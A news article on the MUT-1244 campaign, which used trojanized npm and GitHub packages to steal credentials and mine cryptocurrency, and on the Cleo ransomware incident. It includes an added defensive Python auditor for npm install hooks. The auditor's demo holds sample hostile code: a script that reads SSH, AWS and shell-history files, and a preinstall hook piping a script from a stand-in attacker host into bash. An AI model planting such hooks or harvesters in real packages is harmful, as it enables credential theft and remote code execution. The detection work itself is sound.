The year of the cyber attack apparently won’t end quietly.
For example, a report Friday (December 13) by Ars Technica covers a year-long campaign that stole credentials from both “malicious and benevolent” security personnel by infecting them with trojanized versions of open source software distributed through GitHub repositories and npm packages.
According to the report, the campaign has been documented by the security companies Checkmarx and Datadog Security Labs, which say the attackers infected the devices of researchers in security and other technical fields.
The attackers have yet to be identified, the report said, although Datadog researchers track them as MUT-1244. (MUT is Datadog’s abbreviation for “mysterious, unattributed threat.”)
These attackers, the report said, install a professionally developed backdoor that hides its own presence. They also ran spearphishing campaigns aimed at thousands of researchers who publish papers on the arXiv platform.
According to the report, the hackers appear to have more than one goal. One of these is to collect SSH private keys, Amazon Web Services access keys, command histories, and other sensitive information from infected devices.
At the time Ars Technica published its report, dozens of machines were still infected, and a single Dropbox account used by the attackers held roughly 390,000 stolen login credentials for WordPress websites. The malware used in the attacks also installs cryptocurrency-mining software, which was found on at least 68 machines last month, the report said.
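Since the vector described above is trojanized npm packages that harvest SSH private keys, AWS access keys and shell history, one quick check a practitioner can run over a project’s dependency tree is to flag packages whose install-time lifecycle scripts (preinstall, install, postinstall, prepare) reference those credential stores, or pipe downloaded content straight into a shell. The Python below is an added example, not code from the article, Ars Technica, Checkmarx or Datadog. It assumes the malicious code runs through npm lifecycle hooks, which is a common vector but is not something the article confirms for MUT-1244, and it audits a constructed sample tree (package names and script contents are invented for the demo) rather than real packages.

```python
"""Audit a node_modules tree for install-time scripts that touch credential stores.

Added example; not code from the article or from Checkmarx/Datadog.
Assumption: the trojanized packages execute via npm lifecycle hooks.
"""
import json
import re
import tempfile
from pathlib import Path

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Paths and variables tied to what the article says was stolen
# (SSH keys, AWS keys, command histories), plus the npm token file.
SENSITIVE_PATTERNS = [re.compile(p) for p in (
    r"\.ssh\b",
    r"id_(rsa|ed25519|ecdsa|dsa)\b",
    r"\.aws\b",
    r"AWS_(SECRET_)?ACCESS_KEY",
    r"\.(bash|zsh)_history\b",
    r"\.npmrc\b",
)]
# Typical "fetch and run" shapes seen in install-time droppers.
REMOTE_EXEC_PATTERNS = [re.compile(p) for p in (
    r"\b(curl|wget)\b[^|]*\|\s*(ba|z)?sh\b",
    r"\bbase64\b[^|]*(-d|--decode)",
)]


def _referenced_scripts(cmd, pkg_dir):
    """Local .js files the lifecycle command runs, e.g. 'node setup.js'."""
    return [pkg_dir / t for t in cmd.split()
            if t.endswith(".js") and (pkg_dir / t).is_file()]


def audit_package(pkg_dir):
    """Return findings for one package directory (empty list if clean)."""
    try:
        manifest = json.loads((pkg_dir / "package.json").read_text(encoding="utf-8"))
    except (OSError, json.JSONDecodeError):
        return [{"package": pkg_dir.name, "hook": None, "reasons": ["unreadable package.json"]}]
    name = manifest.get("name", pkg_dir.name)
    findings = []
    for hook in LIFECYCLE_HOOKS:
        cmd = (manifest.get("scripts") or {}).get(hook)
        if not cmd:
            continue
        # Inspect the command line itself and any local JS file it invokes.
        texts = [cmd] + [f.read_text(encoding="utf-8", errors="replace")
                         for f in _referenced_scripts(cmd, pkg_dir)]
        reasons = []
        if any(p.search(t) for p in SENSITIVE_PATTERNS for t in texts):
            reasons.append("touches SSH/AWS/history/npm credential paths")
        if any(p.search(t) for p in REMOTE_EXEC_PATTERNS for t in texts):
            reasons.append("pipes remote content to a shell or decodes base64")
        if reasons:
            findings.append({"package": name, "hook": hook, "reasons": reasons})
    return findings


def audit_node_modules(root):
    """Audit every package under any node_modules below root, sorted by name."""
    root = Path(root)
    findings = []
    for manifest in root.rglob("package.json"):
        if "node_modules" in manifest.parent.relative_to(root).parts:
            findings.extend(audit_package(manifest.parent))
    return sorted(findings, key=lambda f: (f["package"], f["hook"] or ""))


# Constructed sample tree (invented package names, not real packages):
# one clean native build, one credential harvester, one remote dropper.
DEMO_PACKAGES = {
    "good-native": {
        "package.json": {"name": "good-native", "version": "1.0.0",
                         "scripts": {"install": "node-gyp rebuild"}}},
    "evil-helper": {
        "package.json": {"name": "evil-helper", "version": "2.3.1",
                         "scripts": {"postinstall": "node setup.js"}},
        "setup.js": ("const fs = require('fs');\nconst home = process.env.HOME;\n"
                     "const loot = {\n"
                     "  ssh: fs.readFileSync(home + '/.ssh/id_rsa', 'utf8'),\n"
                     "  aws: fs.readFileSync(home + '/.aws/credentials', 'utf8'),\n"
                     "  hist: fs.readFileSync(home + '/.bash_history', 'utf8'),\n};\n")},
    "evil-dropper": {
        "package.json": {"name": "evil-dropper", "version": "0.0.3",
                         "scripts": {"preinstall": "curl -fsSL https://attacker.invalid/i.sh | bash"}}},
}


def build_demo_tree():
    """Write DEMO_PACKAGES into a temporary node_modules tree; return the project root."""
    root = Path(tempfile.mkdtemp(prefix="npm-audit-demo-"))
    for pkg, files in DEMO_PACKAGES.items():
        pkg_dir = root / "node_modules" / pkg
        pkg_dir.mkdir(parents=True)
        for fname, content in files.items():
            text = json.dumps(content) if fname == "package.json" else content
            (pkg_dir / fname).write_text(text, encoding="utf-8")
    return root


def run_demo():
    """Build the sample tree and return its findings (two flagged packages)."""
    return audit_node_modules(build_demo_tree())


if __name__ == "__main__":
    for f in run_demo():
        print(f"{f['package']} [{f['hook']}]: {'; '.join(f['reasons'])}")
```

Run it against a real checkout by calling audit_node_modules on the project directory instead of the demo tree. The check is deliberately narrow: a package that hides its payload in a required module rather than the lifecycle command line, or that obfuscates the credential paths, will not be caught, so treat a clean result as the absence of one specific pattern rather than a clean bill of health.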
These attacks are part of a wave of similar incidents this year at companies across sectors. For example, PYMNTS wrote last week about a ransomware attack exploiting Cleo’s LexiCom, VLTransfer and Harmony enterprise file transfer tools, underscoring the urgent need to secure the corporate infrastructure that handles sensitive data.
“Critical business infrastructure, in particular its many elements exposed to the Internet, are attractive targets for attackers,” said that report. “That makes prevention and a versatile defense crucial. By understanding the vulnerabilities of enterprise software tools and implementing security measures, companies protect their data and mitigate the risks associated with data breaches.”
Several factors played a role in the Cleo incident. First, enterprise file transfer tools often hold extensive permissions and access rights that span networks. Second, these systems typically process large volumes of sensitive data, making them a prime target for extortion. Finally, many organizations rely on outdated file transfer infrastructure that may not receive regular security updates.